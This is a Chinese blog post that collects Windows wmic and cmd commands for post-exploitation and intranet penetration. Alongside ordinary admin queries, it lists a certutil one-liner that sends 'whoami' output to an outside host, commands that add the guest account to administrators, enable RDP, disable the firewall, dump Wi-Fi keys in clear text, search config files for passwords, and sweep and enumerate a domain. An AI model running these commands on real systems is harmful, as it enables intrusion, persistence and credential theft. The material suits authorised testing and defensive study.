windows命令总结
2019-12-06 本文已影响0人
CSeroad
前言
整理了一些命令,不只是wmic命令,也有其他的好玩命令。
wmic命令总结
查看计算机补丁安装详情
wmic qfe list
列出进程
wmic process list brief
获取进程路径
wmic process get description,executablepath
wmic process where name="java.exe" get executablepath
根据应用程序查找PID
wmic process where name="cmd.exe" get processid,executablepath,name
获取某个进程详情
wmic process where name="chrome.exe" list full
创建新进程
wmic process call create notepad
wmic process call create "C:\Program Files\Tencent\qq.exe"
wmic process call create "shutdown.exe -r -f -t 20"
删除指定进程
wmic process where name="qq.exe" call terminate
wmic process where processid="2316" delete
wmic process 2316 call terminate
查看启动项
wmic startup
查看共享
wmic share get name,path
查看安装的软件版本
wmic product get name,version
查看是否为虚拟机
wmic bios list full | find /i "vmware"
获取机器名
wmic path win32_computersystem get dnshostname
获取系统名称
wmic path win32_operatingsystem get name
查看系统32位还是64位
wmic path win32_operatingsystem get osarchitecture
获取系统域名
wmic path win32_computersystem get domain
获取AV详情
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
base64编码
certUtil -encode 1.jsp 1.txt
base64解码
certUtil -decode 1.txt 1.jsp
cmd命令总结
输出结果到文件
net user > a.txt 2>&1
查看进程
tasklist /svc
删除进程
taskkill /f /im shell.exe
根据PID删除
taskkill /pid 5396 /F
路由跟踪
tracert IP
查询DNS
nslookup domain
查看登录用户
qwinsta
查看路由表
route print
查看计划任务
schtasks /query /fo list /v
类似vim命令,ctr+z退出,并创建成功
copy con test.vbs
递归查找某个文件
cd /d E: && dir /b /s Logon.aspx
Dns 带外命令执行
for /f %i in ('whoami') do certutil -urlcache -split -f http://x.x.x.x/%i
命令执行不出网
cd c:\ && for /f %i in ('dir /s /b c:fastjson-1.2.47.jar') do (echo %i> %i.path.txt) & (ipconfig > %i.ipconfig.txt)
激活guest
net user guest /active:yes
net user guest Qax@123456
net localgroup administrators guest /add
递归查找文件内容
findstr /si password config.* *.ini *.txt //查看后缀名文件中含有password关键字的文件
查看是否开启3389
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
0x1表示关闭,0x0表示开启
修改注册表开启3389
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
这里收集了两种。
查找TermService服务端口
tasklist /svc | findstr "TermService"
netstat -ano | find "PID"
批量扫描内网存活主机
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"
批量net view 输出机器名和ip
FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)
批量查找B段存活主机,保存为批处理文件。
@echo off
for /l %%i in (1,1,255) do (
for /l %%j in (1,25,255) do (
@ ping -w 1 -n 1 10.0.%%i.%%j | find /i "ttl="
)
)
关闭防火墙
windows server 2003 及之前的版本
netsh fiewall set opmode disable
windows server 2003 及之后的版本
netsh advfiewall set allprofiles state off
添加防火墙规则
netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=6666
查看防火墙策略
netsh firewall show config
netsh firewall show state
查看无线密码
netsh wlan show profiles
netsh wlan show profiles name="profiles" key=clear
内网渗透
启用telnet
dism /online /Enable-Feature /FeatureName:TelnetClient
查看域控制器
net group "Domain controllers"
查看当前网络域环境
net view /domain
查看域内管理员
net group "domain admins" /domain
查看域内所有机器名
net group "domain computers" /domain
查找外网对应的内网资产
for /f "delims=" %i in (domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"test.com" >> service.txt
domains.txt为外网收集的域名,for循环ping域名,并将结果输出到service.txt
查找内网IP资产
for /f "delims=" %i in (web.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> out.txt
待补充......
参考资料
域渗透总结
WMIC后渗透利用
内网渗透常用命令总结
WMIC命令利用方式
